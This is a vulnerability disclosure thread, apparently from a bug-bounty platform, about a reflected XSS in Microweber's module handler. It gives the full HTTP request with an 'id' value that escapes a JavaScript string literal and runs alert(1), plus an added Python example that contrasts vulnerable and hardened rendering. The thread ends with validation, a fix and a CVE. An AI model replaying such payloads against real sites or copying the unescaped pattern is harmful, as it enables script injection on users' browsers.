Cross-site Scripting (XSS) - Reflected in microweber/microweber

Valid

Reported on

Jul 14th 2022


Description

Hi team, I found an XSS at /module/.

Proof of Concept

Pop up POC: [screenshot not preserved in this copy]

Reflected POC: [screenshot not preserved in this copy]

Full request payload:

POST /demo/module/ HTTP/1.1
Host: demo.microweber.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close

type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings

Impact

XSS

Occurrences

The module handler does not filter or escape the 'id' parameter before embedding it inside a script tag, so an attacker can terminate the JavaScript string literal with an apostrophe and append arbitrary script.
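To make the failure mode concrete, here is an added example (written for this page, not Microweber's code) that reproduces the pattern the report describes, the id parameter interpolated into a single-quoted `mw.$('...')` call, beside a hardened renderer and a small check that tells the two apart. The template strings, the `render_*` function names, the allowlist regex and the test input are all assumptions of this example; the test input mirrors the report's breakout shape but only calls `console.log`.

```python
"""Added example: rendering an element id into a <script> block.

Assumptions (not from the report): the page builds a selector string with
Python formatting, mirroring the reported mw.$('<id>-checkout-process')
pattern.  Names and templates here are illustrative.
"""
import json
import re

# Constructed test input with the same shape as the report's payload: an
# apostrophe closes the string literal, then new statements follow.
BREAKOUT_ID = "js-ajax-cart');console.log('x');mw.$('"

# Element ids have a narrow legitimate alphabet; reject everything else.
ID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def render_vulnerable(element_id: str) -> str:
    """Raw interpolation into a single-quoted JS string (the reported bug)."""
    return f"mw.$('{element_id}-checkout-process');"


def js_string(value: str) -> str:
    """Encode a Python string as a JS string literal that is safe inside
    <script>: JSON escaping covers quotes, backslashes and control characters;
    the extra replacements cover apostrophes, '<', '>', '&' and the two
    Unicode line terminators, so no literal delimiter or </script> survives."""
    encoded = json.dumps(value)
    for raw, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                     ("'", "\\u0027"), ("\u2028", "\\u2028"),
                     ("\u2029", "\\u2029")):
        encoded = encoded.replace(raw, esc)
    return encoded


def render_hardened(element_id: str, strict: bool = True) -> str:
    """Allowlist the id (strict) and always emit it as an escaped literal."""
    if strict and not ID_RE.match(element_id):
        raise ValueError("invalid element id")
    return f"mw.$({js_string(element_id)} + '-checkout-process');"


def code_skeleton(script: str) -> str:
    """Strip the contents of JS string literals (honouring backslash escapes)
    so only the code structure remains.  If untrusted data changed the
    structure, the skeleton no longer matches the template's skeleton."""
    out, i, n = [], 0, len(script)
    while i < n:
        ch = script[i]
        if ch in ("'", '"'):
            out.append(ch)
            i += 1
            while i < n and script[i] != ch:
                i += 2 if script[i] == "\\" else 1   # skip escaped char
            out.append(ch)
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def breakout_detected(script: str, expected_skeleton: str) -> bool:
    """True when the rendered snippet has more code than the template."""
    return code_skeleton(script) != expected_skeleton


if __name__ == "__main__":
    print(render_vulnerable(BREAKOUT_ID))
    print(breakout_detected(render_vulnerable(BREAKOUT_ID), "mw.$('');"))
    print(render_hardened(BREAKOUT_ID, strict=False))
    print(breakout_detected(render_hardened(BREAKOUT_ID, strict=False),
                            "mw.$(\"\" + '');"))
```

The allowlist is the real fix for an element id; the `js_string` layer is what protects the template if a less constrained value ever has to reach script context. `code_skeleton` is a review-time aid for comparing a rendered page against its template, not a runtime filter.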

We are processing your report and will contact the microweber team within 24 hours. 20 days ago
We have contacted a member of the microweber team and are waiting to hear back 19 days ago
Peter Ivanov
19 days ago

Maintainer


Hello,

Thanks for the report.

We cannot simulate this. Maybe it was fixed in the previous version.

Can you provide a video POC showing where the user can encounter this error?

Deshine
18 days ago

Researcher


Hi Peter Ivanov, this is the full video POC:

https://github.com/Kingerbans/images/blob/main/2022-07-16%2019-32-39.mp4

Maybe you should download the images folder because the video is too big for GitHub to display.

Hope you validate the issue.

Thank you, deshine

We have sent a follow up to the microweber team. We will try again in 7 days. 16 days ago
Peter Ivanov modified the Severity from Medium to Low 16 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 16 days ago
Deshine has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on d28655 16 days ago
Peter Ivanov has been awarded the fix bounty
index.php#L80-L92 has been validated
Deshine
16 days ago

Researcher


Hi @admin @maintainer, I wonder if I can get a CVE for this vulnerability?

Jamie Slome
15 days ago

Admin


Happy to assign a CVE to this report if the maintainer gives their permission.

@maintainer?

Peter Ivanov
15 days ago

Maintainer


Yes @admin, you can assign a CVE.

Jamie Slome
15 days ago

Admin


Sorted 👍

Deshine
15 days ago

Researcher


Thanks so much @admin @maintainer.
